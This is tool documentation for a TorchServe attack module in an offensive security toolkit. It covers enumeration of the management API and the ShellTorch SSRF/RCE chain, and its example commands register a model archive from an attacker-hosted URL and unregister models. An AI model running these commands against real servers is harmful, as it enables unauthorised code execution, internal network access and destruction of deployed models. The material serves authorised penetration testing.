Skip to content

TorchServe

Enumerate and exploit PyTorch TorchServe model serving instances.

Overview

The torchserve module targets TorchServe's separate management, inference, and metrics APIs. The management API (default port 8081) is the primary attack surface, exposing model registration, scaling, and deletion. The --target flag points to the management API; use --inference-url and --metrics-url to override the inference (8080) and metrics (8082) ports.

The register subcommand tests the critical ShellTorch SSRF/RCE vector (CVE-2023-43654, CVE-2024-35195) that enables arbitrary code execution via malicious model archive registration.

Subcommands

Read-Only (no --force-exploit required)

Subcommand Description
enum List models from management API and check inference health
models Detailed model info (handler, runtime, workers, batch size)
metrics Prometheus metrics from metrics API

Gated (requires --force-exploit)

Subcommand Description
predict Send prediction via inference API
register Register model from URL (ShellTorch SSRF/RCE vector)
scale Scale model workers (proves management write access)
unregister Delete a model (proves destructive access)

Flags

Flag Required Description
--target Yes Management API URL (default port 8081)
--header No Custom HTTP headers. Repeatable.
--inference-url No Override inference API URL (default: derived from target with port 8080)
--metrics-url No Override metrics API URL (default: derived from target with port 8082)
--model For models, predict, scale, unregister Model name
--payload For predict JSON prediction payload
--model-url For register URL of model archive (.mar) to register
--min-workers For scale Minimum worker count (default: 1)

Key Endpoints

Management API (port 8081)

Endpoint Method Purpose
/models GET List all registered models
/models/<name> GET Detailed model info
/models?url=<url> POST Register model from URL (SSRF vector)
/models/<name>?min_worker=<n> PUT Scale workers
/models/<name> DELETE Unregister model

Inference API (port 8080)

Endpoint Method Purpose
/ping GET Health check
/<model>/predictions POST Inference request

Metrics API (port 8082)

Endpoint Method Purpose
/metrics GET Prometheus metrics

ShellTorch Vulnerability

The register subcommand tests the ShellTorch attack chain:

  • CVE-2023-43654 -- SSRF via model registration URL, allowing requests to internal services and cloud metadata endpoints
  • CVE-2024-35195 -- arbitrary code execution through malicious model archive files

When the management API accepts a registration request from an external URL, it confirms the SSRF vector is exploitable.

Examples

# Enumerate models and health
./aipostex torchserve --target http://127.0.0.1:8081 enum

# Detailed model info
./aipostex torchserve --target http://127.0.0.1:8081 models --model resnet

# Extract metrics
./aipostex torchserve --target http://127.0.0.1:8081 metrics

# Test prediction (gated)
./aipostex torchserve --target http://127.0.0.1:8081 predict \
  --model resnet --payload '{"data": "test"}' --force-exploit

# ShellTorch SSRF test (gated)
./aipostex torchserve --target http://127.0.0.1:8081 register \
  --model-url http://attacker.com/test.mar --force-exploit

# Scale workers (gated)
./aipostex torchserve --target http://127.0.0.1:8081 scale \
  --model resnet --min-workers 2 --force-exploit

# Unregister model (gated)
./aipostex torchserve --target http://127.0.0.1:8081 unregister \
  --model resnet --force-exploit

Workflow Progression

discover network (discovers TorchServe on :8080/:8081)
  -> torchserve enum (model listing, health)
    -> torchserve models --model <name> (handler, workers)
    -> torchserve metrics (operational data)
    -> torchserve predict --model <name> (inference test, gated)
    -> torchserve register --model-url <url> (ShellTorch SSRF, gated)